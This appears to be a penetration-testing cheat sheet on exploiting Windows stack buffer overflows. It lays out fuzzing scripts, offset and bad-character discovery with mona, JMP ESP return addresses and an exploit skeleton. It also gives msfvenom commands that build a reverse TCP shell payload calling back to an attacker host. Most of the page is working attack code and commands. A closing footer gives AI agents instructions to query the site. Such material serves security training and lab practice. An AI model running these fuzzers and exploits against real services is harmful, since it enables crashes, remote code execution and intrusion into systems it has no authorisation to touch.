# Windows ## 00. Basic Process ```bash ## ------------------| Setup Immunity Debugger ## Run Immunity Debugger as admin user. ## Press CTRL + F1 to attach service. ## ------------------| Config Mona !mona config -set workingfolder c:\mona\%p ## ------------------| Fuzzing ## Run fuzzing script to catch the buffer size. ## Imagine your programe was crashed when it hit 2000 buffer size, ## then please use 2400 or 2600 as value. ## ------------------| Find the offset value ## Create cyclic pattern /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l ## After crash the programe, copy the ESP value /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q ## Or you can use mona to find offset value as well. !mona findmsp -distance ## To verify this use buffer as following buf = "A" * offset + "B" * 4 ## Then you will get EIP as 42424242. ## ------------------| Find bad characters ## Copy following as badchars badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ## Edit the payload buffer as following buff = "A" * offset + "B" * 4 + badchars ## After send the evil buffer, right click the ESP value and select Follow in Dump. ## Then you can see the char values on Hex dump section. ## Or you can use mona to do that for you !mona bytearray -b "\x00" !mona compare -f C:\mona\\bytearray.bin -a ## Replicate the scenario until it give status as unmodified ## ------------------| Find the return address !mona jmp -r esp -cpb "" ## Then lock for Log data(2) window ## After that copy the address. Ex: 0F9E24F9 ## And then convert it to little endian format. Ex: \xF9\x24\x9E\x0F ## After all you buffer would be like following buff = "A" * offset + "\xF9\x24\x9E\x0F" ## Before run the programe, create break point on 0F9E24F9 address. ## ------------------| Create the payload msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 EXITFUNC=thread -b "\x00" -f c msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00" ## Paste hex values as follow payload = ("\xbd........\xb1" "........" ".....") ## After all you buffer would be like following buff = "A" * offset + "\xF9\x24\x9E\x0F" + "\x90" * 16 + payload ``` ## 01. Fuzzing Skeletons * Basic ```python #!/usr/bin/env python3 import socket, time, sys host = '192.168.228.10' port = 110 buf = "A" * 1000 while (True): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.recv(1024) s.send(bytes('USER '+buf+'\r\n',"latin-1")) s.recv(1024) s.send(bytes('QUIT\r\n',"latin-1")) s.close() time.sleep(1) buf += "A" * 1000 print("Send buffer {}!".format(len(buf))) ``` * Source : [Tib3rius](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) ```python #!/usr/bin/env python3 import socket, time, sys ip = "10.10.11.32" port = 1337 prefix = "STATS " timeout = 5 string = prefix + "A" * 100 print("================[ Fuzzing Start ]=================") while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("[+] Fuzzing {} bytes...".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("-" * 50) print("\033[38;5;208m[!]\033[0;0m Program crashed at\033[92m {}\033[00m bytes !".format(len(string) - len(prefix))) print("-" * 50) sys.exit(0) string += 100 * "A" time.sleep(1) ``` * HTTP Fuzzer ```python #!/usr/bin/python3 import socket, time, sys host="127.0.0.1" port=80 uri="/login" buff_size = 100 while(buff_size < 2000): try: print(f'[+] Sending malicious buffer with {buff_size} ..!') input_buffer = "A" * buff_size post_data = f'username={input_buffer}&password=test' #print(post_data) buffer = f'POST {uri} HTTP/1.1\r\n' buffer += f'HOST: {host}\r\n' buffer += f'Content-Type: application/x-www-form-urlencoded\r\n' buffer += f'Content-Length: {str(len(post_data))}\r\n' buffer += '\r\n' buffer += post_data s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buffer.encode()) s.close() buff_size += 100 time.sleep(10) except: print("[-] Could not connect!") sys.exit() ``` ## 02. Crash Replication & Controlling EIP * Source : [Tib3rius](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst) * Exploit Skelton ```python #!/usr/bin/env python3 import socket ip = "10.10.11.32" port = 1337 prefix = "STATS " offset = 0 overflow = "A" * offset retn = "" # 625011AF <--> \xaf\x11\x50\x62 padding = "" # "\x90" * 16 payload = "" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("-" * 50) print("[!] Sending the buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("\033[38;5;208m[+]\033[0;0m Done!") print("-" * 50) except: print("[*] Unable to connect!") ``` ## 03. Generate bad chars * From [joshua17sc](https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py) ```python #!/usr/bin/env python3 from __future__ import print_function #tart with 00 and add any others you find bad = "00".split() #turns them into a nice string to copy into python print("badchars = ") for x in range(1, 256): if "{:02x}".format(x) not in bad: print("\\x" + "{:02x}".format(x), end='') #creates a nice string to use in Mona print("\n\nfor mona") for byte in bad: print("\\x{}".format(byte), end='') print() ``` ```python #!/usr/bin/env python3 for x in range(1, 256): print("\\x" + "{:02x}".format(x), end='') print() ``` ## 04. Mona Scripts ```bash # -----------------| Configure mona for current running application !mona config -set workingfolder c:\mona\%p # -----------------| Finding the crash !mona findmsp -distance 600 # -----------------| Finding the bad chars !mona bytearray -b "\x00" !mona compare -f C:\mona\bytearray.bin -a

# -----------------| Finding a Jump Point !mona jmp -r esp -cpb "\x00" ``` ## 05. Spiking ```bash ./generic_send_tcp script.spk 0 0 # -----------| spike script template s_readline(): s_string("CMD "); s_string_variable("0"); ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/binary-exploitation/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.